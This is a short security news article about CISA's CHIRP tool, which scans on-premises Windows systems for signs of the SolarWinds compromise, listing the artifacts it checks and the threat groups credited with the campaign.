The US-based Cybersecurity and Infrastructure Security Agency (CISA) released a tool that security teams can use to detect malicious activity associated with the SolarWinds compromises in on-premise enterprise systems.
The tool is called CISA Hunt and Incident Response Program (CHIRP), and it is written in Python. It detects IOCs related to hacker activity against SolarWinds software running on Windows OS.
“Similar to Sparrow—which scans for signs of APT compromise within an M365 or Azure environment—CHIRP scans for signs of APT compromise within an on-premises environment,” CISA explained.
CHIRP searches for IOCs associated with malicious activity related to alerts tracked by CISA as AA20-352A and AA21-008A in an on-premises enterprise environment.
The two alerts describe attacks in which cybercriminals use trojanized SolarWinds Orion products and compromised apps in the victims’ Microsoft 365 (M365)/Azure environment as initial attack vectors.
When scanning, CHIRP sends JSON formatted data for further analysis in a SIEM or other similar tools. CISA says organizations can use CHIRP to:
- Examine Windows Registry for evidence of intrusion;
- Examine Windows event logs for artifacts related to SolarWinds attacks;
- Query Windows network artifacts; and
- Apply YARA rules to detect malware and implants.
In addition system admins can use CHIP to look for:
- The presence of TEARDROP and RAINDROP malware;
- Credential dumping certificate pulls;
- System, network, and M365 enumeration;
- Certain persistence mechanisms identified as associated with this campaign; and
- Known observable indicators of lateral movement.
CHIRP can be used in addition to CISA’s PowerShell-based tool Sparrow that detects potentially compromised apps and accounts in Azure/Microsoft 365 environments.
The hacker groups behind SolarWinds attacks have been identified to be UNC2452 (reported by FireEye), SolarStorm (Palo Alto Unit 42), StellarParticle (CrowdStrike), Dark Halo (Volexity), and Nobelium (Microsoft).
The FBI, CISA, ODNI, and the NSA believe that the APT groups behind the SolarWinds attack are likely part of a Russia government-backed hacking conglomerate.